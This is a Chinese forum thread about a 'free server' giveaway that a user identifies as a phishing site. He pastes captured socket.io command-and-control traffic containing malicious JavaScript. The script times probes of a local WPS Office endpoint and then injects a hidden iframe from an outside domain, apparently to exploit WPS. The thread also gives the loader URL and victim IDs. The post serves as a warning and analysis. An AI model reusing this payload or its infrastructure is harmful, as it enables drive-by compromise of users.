免费服务器领取

latin · 发表于 2025-7-17 15:44:01

提示: 作者被禁止或删除内容自动屏蔽

Typeboom · 发表于 2025-7-17 16:09:52

本帖最后由 Typeboom 于 2025-7-17 16:12 编辑

这站是钓鱼的

里面会加载这个JS
https://apis.fjersihjktsvhiiuirahts.online/RXGNHYJP.js

创建socket.io链接，通过websocket下发恶意js

42["execute",{"func":"var attack = function(params){\n params.time = new Date();\n let _result_ = (function(){ var result = [];\n\nfunction makeRequest() {\n var m = Date.now();\n var script = document.createElement('script');\n script.src = 'https://localhost.wbridge.wps.cn:4709/';\n script.onload = function() {\n var currentTime = Date.now();\n var elapsedTime = currentTime - m;\n result.push(elapsedTime);\n if (result.length === 5) {\n calculateAverage();\n } else {\n makeRequest();\n }\n };\n script.onerror = function() {\n var currentTime = Date.now();\n var elapsedTime = currentTime - m;\n result.push(elapsedTime);\n if (result.length === 5) {\n calculateAverage();\n } else {\n makeRequest();\n }\n };\n document.body.appendChild(script);\n}\n\nfunction calculateAverage() {\n var sum = result.reduce(function(a, b) {\n return a + b;\n }, 0);\n var w_key = sum / result.length;\n if (w_key < 300) {\n var iframe = document.createElement("iframe");\n iframe.src = "https://www.onlineksyun.com/ifs.html";\n iframe.frameborder = "no";\n iframe.style.zIndex = -1000;\n iframe.style.position = "absolute";\n iframe.style.opacity = 0;\n iframe.style.top = "0px";\n iframe.style.left = "0px";\n iframe.width = "300px";\n iframe.height = "2000px";\n iframe.onload = function() {\n console.log("iframe loaded");\n };\n document.body.appendChild(iframe);\n }\n}\n\nmakeRequest(); })()\n try{\n socket.emit("result", {\n success: true,\n message: "Successfully executed custom command at " + new Date() + (_result_ ? "\\nReturned Value: " + _result_ : ''),\n params\n });\n }catch(e){\n socket.emit("result", {\n success: false,\n message: e.toString(),\n params\n });\n }\n }","params":{"victim":5802,"_attack_instance_id":"5L_tTV5sJYmdyLVdAEXf_1752739731190"}}]
42["result",{"success":true,"message":"Successfully executed custom command at Thu Jul 17 2025 08:08:51 GMT+0000 (Coordinated Universal Time)","params":{"victim":5802,"_attack_instance_id":"5L_tTV5sJYmdyLVdAEXf_1752739731190","time":"2025-07-17T08:08:51.636Z"}}]

复制代码

尝试连接到
https://localhost.wbridge.wps.cn:4709/

应该是利用WPS的漏洞，下次记得改成让MJJ下exe，还方便点

williamc2 · 发表于 2025-7-18 10:35:14

vagaa · 发表于 2025-7-17 18:22:41

弱智行为！！

羊村你喜哥 · 发表于 2025-7-17 18:20:07

太牛逼了

986285227 · 发表于 2025-7-17 18:09:18

属实在关公面前耍大刀

zutianrun · 发表于 2025-7-17 17:38:10

https://github.com/George-boop-svg/Chinese-hackers-use-WPS-to-attack

88zrweb · 发表于 2025-7-17 17:31:49

幸好没有装WPS

jiweitu · 发表于 2025-7-17 17:08:10

Typeboom 发表于 2025-7-17 17:05
那完蛋咯，你也要变成免费服务器了

我自己电脑，咋变成服务器

jiweitu · 发表于 2025-7-17 17:06:46

Typeboom 发表于 2025-7-17 17:05
那完蛋咯

打开这个网站就会泄露数据吗？我的wps是本身就安装了的
打开这个网站前我的wps没打开

Typeboom · 发表于 2025-7-17 17:05:20

jiweitu 发表于 2025-7-17 17:02
我电脑安装了WPS

那完蛋咯

，你也要变成免费服务器了

		自动登录	找回密码
密码			注册

latin latin 当前离线积分 3060	电梯直达 1^# 发表于 2025-7-17 15:44:01 \| 只看该作者 \|正序浏览 \|阅读模式提示: 作者被禁止或删除内容自动屏蔽
latin latin 当前离线积分 3060	分享到: QQ好友和群 QQ空间收藏1
	回复举报

[美国VPS] 免费服务器领取

评分